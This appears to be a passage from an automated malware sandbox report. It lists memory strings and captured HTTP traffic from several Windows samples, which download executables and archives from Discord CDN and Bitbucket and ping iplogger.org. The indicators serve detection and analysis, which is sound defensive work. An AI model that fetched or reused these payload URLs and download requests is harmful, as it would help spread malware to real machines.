      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
      Source: We7WnoqeXe.exe, 00000001.00000002.388766609.0000000003D72000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
      Source: slhost.exe, 0000000F.00000003.398898364.000002B9A4D73000.00000004.00000001.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
      Source: We7WnoqeXe.exe, 00000001.00000002.390321393.0000000003EFF000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
      Source: We7WnoqeXe.exe, 00000001.00000002.390321393.0000000003EFF000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
      Source: We7WnoqeXe.exe, 00000001.00000002.390321393.0000000003EFF000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
      Source: We7WnoqeXe.exe, 00000001.00000002.390321393.0000000003EFF000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response(V
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmp, We7WnoqeXe.exe, 00000001.00000002.390321393.0000000003EFF000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
      Source: We7WnoqeXe.exe, 00000001.00000002.390321393.0000000003EFF000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response(V
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
      Source: We7WnoqeXe.exe, 00000001.00000002.388766609.0000000003D72000.00000004.00000001.sdmp, We7WnoqeXe.exe, 00000001.00000002.390321393.0000000003EFF000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmp, We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4(V
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
      Source: We7WnoqeXe.exe, 00000001.00000002.390321393.0000000003EFF000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmp, We7WnoqeXe.exe, 00000001.00000002.390321393.0000000003EFF000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
      Source: slhost.exe, System.exeString found in binary or memory: http://www.winimage.com/zLibDll
      Source: slhost.exe, 0000000F.00000002.562919572.00007FF7DCDAA000.00000040.00020000.sdmp, System.exe, 00000021.00000003.445175863.0000027F973F0000.00000004.00000001.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.11.z%02dH2
      Source: System.exe, 00000021.00000002.565038677.00007FF7CE47A000.00000040.00020000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.11.z%02dH2I
      Source: We7WnoqeXe.exe, 00000001.00000002.391414496.000000000409C000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
      Source: slhost.exe, 0000000F.00000003.416529578.000002B9A4E20000.00000004.00000001.sdmp, System.exe, 00000021.00000003.508526993.0000027F95B9B000.00000004.00000001.sdmpString found in binary or memory: https://aui-cdn.atlassian.com
      Source: slhost.exe, 0000000F.00000002.550298886.000002B9A4DDA000.00000004.00000020.sdmpString found in binary or memory: https://bbuseruds.s
      Source: slhost.exe, 0000000F.00000003.400240423.000002B9A4D87000.00000004.00000001.sdmp, System.exe, 00000021.00000002.558708758.0000027F95B17000.00000004.00000020.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
      Source: slhost.exe, 0000000F.00000003.400240423.000002B9A4D87000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com//
      Source: slhost.exe, 0000000F.00000003.400240423.000002B9A4D87000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/3
      Source: slhost.exe, 0000000F.00000003.400240423.000002B9A4D87000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/U
      Source: slhost.exe, 0000000F.00000003.400240423.000002B9A4D87000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/Y
      Source: slhost.exe, 0000000F.00000003.399877850.000002B9A4DD1000.00000004.00000001.sdmp, slhost.exe, 0000000F.00000003.399658102.000002B9A4DB1000.00000004.00000001.sdmp, slhost.exe, 0000000F.00000003.399953979.000002B9A4D46000.00000004.00000001.sdmp, System.exe, 00000021.00000002.560070469.0000027F95B3E000.00000004.00000020.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/4cedbadc-424b-
      Source: System.exe, 00000021.00000002.560744277.0000027F95B64000.00000004.00000020.sdmp, System.exe, 00000021.00000000.519263037.0000027F95BA6000.00000004.00000020.sdmp, System.exe, 00000021.00000000.529682352.0000027F95A6B000.00000004.00000020.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/7737de24-30d9-
      Source: System.exe, 00000021.00000002.560744277.0000027F95B64000.00000004.00000020.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/l
      Source: slhost.exe, 0000000F.00000003.399658102.000002B9A4DB1000.00000004.00000001.sdmp, System.exe, 00000021.00000002.558708758.0000027F95B17000.00000004.00000020.sdmpString found in binary or memory: https://bitbucket.org/
      Source: System.exe, 00000021.00000002.560744277.0000027F95B64000.00000004.00000020.sdmpString found in binary or memory: https://bitbucket.org/(
      Source: slhost.exe, 0000000F.00000002.548114268.000002B9A4D27000.00000004.00000020.sdmpString found in binary or memory: https://bitbucket.org/X5
      Source: slhost.exe, 0000000F.00000002.548813130.000002B9A4D51000.00000004.00000020.sdmpString found in binary or memory: https://bitbucket.org/gZ
      Source: slhost.exe, 0000000F.00000002.548114268.000002B9A4D27000.00000004.00000020.sdmp, System.exe, 00000021.00000002.560070469.0000027F95B3E000.00000004.00000020.sdmpString found in binary or memory: https://bitbucket.org/tilttilttilt/test1/downloads/CPU.zip
      Source: System.exe, 00000021.00000000.535166212.0000027F95B9F000.00000004.00000020.sdmp, System.exe, 00000021.00000003.508526993.0000027F95B9B000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/tilttilttilt/test1/downloads/CPU.zip=::
      Source: System.exe, 00000021.00000002.560744277.0000027F95B64000.00000004.00000020.sdmpString found in binary or memory: https://bitbucket.org/tilttilttilt/test1/downloads/CPU.zipH
      Source: System.exe, 00000021.00000002.560744277.0000027F95B64000.00000004.00000020.sdmpString found in binary or memory: https://bitbucket.org/tilttilttilt/test1/downloads/CPU.zipPD
      Source: slhost.exe, 0000000F.00000002.550677615.000002B9A4E02000.00000004.00000020.sdmpString found in binary or memory: https://bitbucket.org/tilttilttilt/test1/downloads/CPU.zipe
      Source: System.exe, 00000021.00000002.560744277.0000027F95B64000.00000004.00000020.sdmpString found in binary or memory: https://bitbucket.org/tilttilttilt/test1/downloads/CPU.zipf
      Source: slhost.exe, 0000000F.00000002.562919572.00007FF7DCDAA000.00000040.00020000.sdmp, System.exe, 00000021.00000002.565038677.00007FF7CE47A000.00000040.00020000.sdmpString found in binary or memory: https://bitbucket.org/tilttilttilt/test1/downloads/GPU6.ziphttps://bitbucket.org/tilttilttilt/test1/
      Source: slhost.exe, 0000000F.00000003.399905859.000002B9A4D2D000.00000004.00000001.sdmp, System.exe, 00000021.00000002.558708758.0000027F95B17000.00000004.00000020.sdmpString found in binary or memory: https://bitbucket.org/tilttilttilt/test1/downloads/UpSys.exe
      Source: System.exe, 00000021.00000000.529682352.0000027F95A6B000.00000004.00000020.sdmpString found in binary or memory: https://bitbucket.org/tilttilttilt/test1/downloads/UpSys.exe=G
      Source: System.exe, 00000021.00000000.529682352.0000027F95A6B000.00000004.00000020.sdmpString found in binary or memory: https://bitbucket.org/tilttilttilt/test1/downloads/UpSys.exeuGc
      Source: slhost.exe, 0000000F.00000002.548813130.000002B9A4D51000.00000004.00000020.sdmpString found in binary or memory: https://bitbucket.org/wYO
      Source: We7WnoqeXe.exe, 00000001.00000002.391049909.0000000003FDE000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
      Source: rnyuf.exe, 00000013.00000003.470176267.0000000001707000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/
      Source: We7WnoqeXe.exe, 00000001.00000002.388766609.0000000003D72000.00000004.00000001.sdmp, We7WnoqeXe.exe, 00000001.00000002.390321393.0000000003EFF000.00000004.00000001.sdmp, We7WnoqeXe.exe, 00000001.00000002.390726665.0000000003F9B000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/878034206570209333/907977083509145650/vms.exe
      Source: rnyuf.exe, 00000013.00000003.470176267.0000000001707000.00000004.00000001.sdmp, rnyuf.exe, 00000013.00000003.453787966.00000000016F0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exe
      Source: rnyuf.exe, 00000013.00000002.567773816.00000000016DC000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exe#
      Source: rnyuf.exe, 00000013.00000002.567773816.00000000016DC000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exe#1000098001https
      Source: rnyuf.exe, 00000013.00000003.470128556.00000000016FA000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exe#w
      Source: rnyuf.exe, 00000013.00000003.453787966.00000000016F0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exep
      Source: rnyuf.exe, 00000013.00000003.453787966.00000000016F0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exes
      Source: We7WnoqeXe.exe, 00000001.00000002.391049909.0000000003FDE000.00000004.00000001.sdmp, We7WnoqeXe.exe, 00000001.00000002.388766609.0000000003D72000.00000004.00000001.sdmp, We7WnoqeXe.exe, 00000001.00000002.390321393.0000000003EFF000.00000004.00000001.sdmp, rnyuf.exe, 00000013.00000002.569193502.0000000004D00000.00000004.00000001.sdmp, rnyuf.exe, 00000013.00000002.567639457.00000000016B9000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe
      Source: rnyuf.exe, 00000013.00000002.567818881.0000000001707000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe#
      Source: rnyuf.exe, 00000013.00000002.567818881.0000000001707000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe#lno-cache/k8
      Source: rnyuf.exe, 00000013.00000002.569193502.0000000004D00000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exeT_
      Source: We7WnoqeXe.exe, 00000001.00000002.391049909.0000000003FDE000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com4
      Source: We7WnoqeXe.exe, 00000001.00000002.391414496.000000000409C000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: System.exe, 00000021.00000003.508526993.0000027F95B9B000.00000004.00000001.sdmpString found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
      Source: We7WnoqeXe.exe, 00000001.00000002.391414496.000000000409C000.00000004.00000001.sdmp, We7WnoqeXe.exe, 00000001.00000002.395032158.00000000052A8000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: We7WnoqeXe.exe, 00000001.00000002.391414496.000000000409C000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: We7WnoqeXe.exe, 00000001.00000002.395032158.00000000052A8000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab(V
      Source: We7WnoqeXe.exe, 00000001.00000002.391414496.000000000409C000.00000004.00000001.sdmp, We7WnoqeXe.exe, 00000001.00000002.395032158.00000000052A8000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: rnyuf.exe, 00000013.00000002.569308596.0000000004D23000.00000004.00000001.sdmpString found in binary or memory: https://g/k8FppT/index.php?scr=1
      Source: slhost.exe, 0000000F.00000002.550047226.000002B9A4DB1000.00000004.00000020.sdmpString found in binary or memory: https://iplogger.org/1
      Source: slhost.exe, 0000000F.00000002.550047226.000002B9A4DB1000.00000004.00000020.sdmpString found in binary or memory: https://iplogger.org/1fEwd7
      Source: slhost.exe, 0000000F.00000002.550047226.000002B9A4DB1000.00000004.00000020.sdmpString found in binary or memory: https://iplogger.org/1fEwd7I
      Source: slhost.exe, 0000000F.00000002.550047226.000002B9A4DB1000.00000004.00000020.sdmpString found in binary or memory: https://iplogger.org/=
      Source: slhost.exe, 0000000F.00000002.548114268.000002B9A4D27000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com
      Source: We7WnoqeXe.exe, 00000001.00000002.391414496.000000000409C000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
      Source: We7WnoqeXe.exe, 00000001.00000002.391414496.000000000409C000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: slhost.exe, 0000000F.00000003.416529578.000002B9A4E20000.00000004.00000001.sdmp, System.exe, 00000021.00000003.508526993.0000027F95B9B000.00000004.00000001.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
      Source: slhost.exe, 0000000F.00000003.398898364.000002B9A4D73000.00000004.00000001.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
      Source: We7WnoqeXe.exe, 00000001.00000002.391414496.000000000409C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
      Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/907977083509145650/vms.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/908097655173947432/slhost.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/UpSys.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/4cedbadc-424b-4242-93aa-1dc687b9b639/UpSys.exe?Signature=03SjwtOUVCkSGlVBOddWMUL2kd4%3D&Expires=1636631487&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=W.pANh85KmlWZmruQkzmM9Sllvu_UgzE&response-content-disposition=attachment%3B%20filename%3D%22UpSys.exe%22 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: bbuseruploads.s3.amazonaws.com
      Source: global trafficHTTP traffic detected: GET /1fEwd7 HTTP/1.1MySpecialHeder: whateverUser-Agent: RunCache-Control: no-cacheHost: iplogger.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/7737de24-30d9-4daf-b72b-bce98dc0f6f9/CPU.zip?Signature=3Tzq39O6DbHYG0DRC9lAn6yjoV4%3D&Expires=1636631244&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=rNhERZ1bRKwlh0QCY62w5KsnWg9_i2WQ&response-content-disposition=attachment%3B%20filename%3D%22CPU.zip%22 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: bbuseruploads.s3.amazonaws.com
      Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/907992537824907284/vms.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/UpSys.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/908097655173947432/slhost.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /1fEwd7 HTTP/1.1MySpecialHeder: whateverUser-Agent: RunCache-Control: no-cacheHost: iplogger.orgConnection: Keep-AliveCookie: clhf03028ja=102.129.143.91
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /1fEwd7 HTTP/1.1Content-Type: text/htmlMySpecialHeder: whateverUser-Agent: RunHost: iplogger.orgCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/907992537824907284/vms.exe HTTP/1.1Host: cdn.discordapp.com
      Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/908097655173947432/slhost.exe HTTP/1.1Host: cdn.discordapp.com
      Source: global trafficHTTP traffic detected: GET /1fEwd7 HTTP/1.1Content-Type: text/htmlMySpecialHeder: whateverUser-Agent: RunHost: iplogger.orgCache-Control: no-cacheCookie: clhf03028ja=102.129.143.91
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
